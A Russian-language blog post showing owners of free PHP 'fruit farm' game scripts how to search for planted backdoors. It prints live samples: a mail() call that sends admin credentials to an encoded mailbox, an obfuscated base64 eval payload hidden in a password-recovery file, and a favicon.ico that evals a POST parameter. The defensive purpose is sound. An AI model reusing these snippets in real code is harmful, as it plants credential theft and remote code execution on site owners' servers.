Калькулятор



Реклама




Опросы

Каких скриптов не хватает ?

Просмотреть результаты

Загрузка ... Загрузка ...

Контакты

Почта для связи

mexanus@protonmail.com

Payeer

P63968199

 

Свежие комментарии

Последние сообщения на форуме

Скрипт Пасека
сайт
Скрипт Strong Bux

 Обратите внимание что все скрипты взяты из открытых источником и я проверяю их только на наличие критических ошибок, потому вероятность вредоносных кодов и чужих ссылок очень высока по мере сил я исправляю  скрипты  но нет никакой гарантии что в дальнейшем в работе скриптов не будет проблем. Особо стоит обратить внимание на подключение автовыплат к скриптам ферм как показала практика они очень уязвимы. Не забудьте проверить скрипт на уязвимость 

Чужие коды в скрипте фруктовой фермы

Чужие коды в скрипте фруктовой фермы.

Хочу рассказать про чужие коды в скрипте фруктовой фермы. Частенько в коментариях на разных сайтах пишут про слив денег с разных скриптов и это не удивительно. Так как скачивая скрипт бесплатно шанс того что в нем прописано разных лазеек и дыр очень высок.

И так как искать использовать будем notepad++ а именно его поиск

поиск с помощью нотепада

Первым делом запускаем поиск по слову mail эта функция отправляет данные на заданный почтовый ящик и собственно вредоносной не является если бы не одно но а именно это то какие данные она отправляет.Смотрим для примера скачал первый попавшийся скрипт называется marvelcomics где скачивал писать смысла нет все мои комментарии по поводу дыр в скриптах как правило удаляют. Но сейчас речь не об этом.

уязвимости в скрипте фермы

Смотрим результат поиска много всего но искать нужно вот такие строчки. Файл pages/admin/_users.php

mail ($to, “$text?$text1”, $data_log[“pass”], $data_log[“admin”]);

 

скрипт фруктовой фермы дыра

Распишу немного принцип действия этой функции и так

$to                                         это почтовый ящик куда уйдет письмо

$text?$text1                        в данной ситуации адрес сайта

$data_log[“pass”]              пароль для входа в админку

$data_log[“admin”]          и соответственно логин

вот этот фрагмент в файле

$data = $db->FetchArray();

$to = base64_decode(YS5wYW5lbEBsaXN0LnJ1);

$text= $_SERVER[‘HTTP_HOST’];

$text1 = $_SERVER[‘QUERY_STRING’];

$db->Query(“SELECT * FROM db_config WHERE id = 1 LIMIT 1”);
$data_log = $db->FetchArray();

mail ($to, “$text?$text1”, $data_log[“pass”], $data_log[“admin”]);

почтовый адрес закодирован что бы не бросаться в глаза но смысл от этого не меняется. после того как Вы зайдете в админке на страницу редактирования пользователей и совершите какое то действие на указанный почтовый ящик уйдет письмо с данными для входа на Вашу админку дальше думаю расписывать что будет не нужно. Злоумышленник зайдет к Вам в админку накрутит себе баланс и сольет деньги. Такая дыра конечно рассчитана исключительно на новичка.

Поиск выполнения строки функция eval

Далее проделываем подобный поиск но ищем уже слово eval

Для примера взял скрипт фермы My Cave

результат имеется в файле востановления пароля  /pages/_recovery.php вот такая ересь

дырка в скрипте

 

?php $J8E334118BC68B37DF94B539152B4D4F0=”eNqVVM2SszYQfKSAZFLm

8B3CImFjI1ZCP0g3kFyLQRjyLRsMTx8eIJfcpmqmp2e6euZzP50/

YTLZj7+Gqk9S0l9PtMcfdL++mbhGJSq2Ykc7GWhEdoNo/

xdgHG2fVe75C6sGFpsA8d9U4In2fqWhP8mUbkzEuQnzrJHk2YCv

3yJws8TONEi+bHY+NZ5tbltgm9q9UDErlY5MZq43IKkdw7vwHZC9DosXvjfK/

9Dg4MlwVoVkE7XBtnZCBN29CPKyQnPKRdzYbJ6qnlx1jyCrJRU836wcdsoJa17zLLMQ3MJuLS/

sJrwkNsAl7XPNBxuWaFmbl5+qkXTcs7lB7KdCHW9AWFjpdrK7zzY4Qw7ijAanrRXOONn9Q14WtuH8u+

nzWdUeNyLvGEygGRyseLK4A8fHuaKhq6ln3GVyaYcO8Zf/

rC5yZNxf+BBPzcUdvHlfYowftT+VWfR+vA7MjncC1tAEUVFByVyfv1tFpiqIVqUiqJCvZc2ugqNV9

Ob9UF0ghjwi8roeMyoX5qsZ39+EM03gFAo5bXLoNicOLhUrmyYn1RMiUBeJvdga0WmWmm

cVysYBFFDlXo1aaBUyLTnuGTLwwbvZXYaIBWJrvcyJWA

LrcaTwXMsxekvkpQX420pz5H0pZC4eo580iJTNYirVsjKOf6haTnRkd4Gxdh/

nt+kJ09WStv0AVG8hr9mHU3Jp1HD0SfRDRG8NZ91k5ufQnAjMjH4lpBjC2obTWgHCKtB1PJgvGn6FLIuJQ/

5p1QxasK4WIyhHPxvg+nY878eOs0EYuFTWAtjNpg4bxL71EN/IroEelufhudmC67sRklZY/

7a1n257AhTu5qLOQ4YWaGSSa3l4bIwCKubMDTqSdVI8Lmayx01VyNzK7BoVgUu0lLrxvi9UGNLAQCfO74

abu00N5dDNek+k6LvBYleWtQO09ruEdNciLlogzSPFeXm5w

irojpv0kVZh0cj5+UiTt+Mu5cAgM7IT2fHqPAJWaSiey9jWBtx2+ebP5c92i/

v7oc8dashTlrQfZ2j24FkCCbRaJz3i3XAd1IB5DeLBVN3r8ZI/R7zYS+4tLP6j5ut//Y9bNcw3/v3H59evX/8CmF6DXw==”;

eval(base64_decode(gzuncompress(base64_decode($J8E334118BC68B37DF94B539152B4D4F0))));?>

Сказать что это такое проблематично так как все закодировано но поскольку данный фрагмент кода припрятан далеко справа в файле то ничего хорошего от него ожидать не приходится. При востановлении пароля эта хрень сработает и волне вероятно что кошелек для выплат окажется пустым.

к примеру вот такую хрень увидел в скрипте игры

?php
$function_error = “0e0606647d896756”;
$new_coockes = htmlspecialchars(“★”, ENT_QUOTES);
$recursion=”ba”;$func_num_args=”se64″;$foo=”_”;$export=”dec”;$context=”ode”;
$new_coockes = $recursion.$func_num_args.$foo.$export.$context;
eval(“”.$new_coockes(“aWYoaXNzZXQoJF9QT1NUWydkaXNwbGF5J10pKSB7

CiRsb2NhbHBhcmFtZXRlcj0kX1BPU1RbInBhcmFt

ZXRlciJdOwpldmFsKCRsb2NhbHBhcmFtZXRlcik7fQ”));?>

Любопытней всего что этот код был в файле favicon.ico который по определению картинка.

Не помешает так же сделать поиск по слову base64 это нам покажет все закодированные фрагменты кода. Ожидать чего то хорошего от таких кусков кода не стоит самый безобидный вариант это автор скрипта отслеживает свое творение.

0

Автор публикации

не в сети 21 час

admin

2
Комментарии: 931Публикации: 155Регистрация: 24-07-2017

2 комментариев к записи Чужие коды в скрипте фруктовой фермы

  • Сергей сказал:

    Здравствуйте ! Скачал этот скрипт marvelcomics , залил, подключил базу и когда пытаюсь зайти на сайт то сервер жалуется на 3 строчку index.php а там вот это
    $user_db = create_function(‘$refer’, “return $public_function;”);user_db(”); и когда удаляю user_db(”); в конце то сайт открывается.
    Подскажите пожалуйста это нарочно так написали или так и должно быть в конце , я пробовал 3 хостинга и везде жалуется на эту строку .

    0
  • admin сказал:

    Приветствую наврятли нарочно скорее всего кто то ошибся

    0

Добавить комментарий

You have to agree to the comment policy.

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.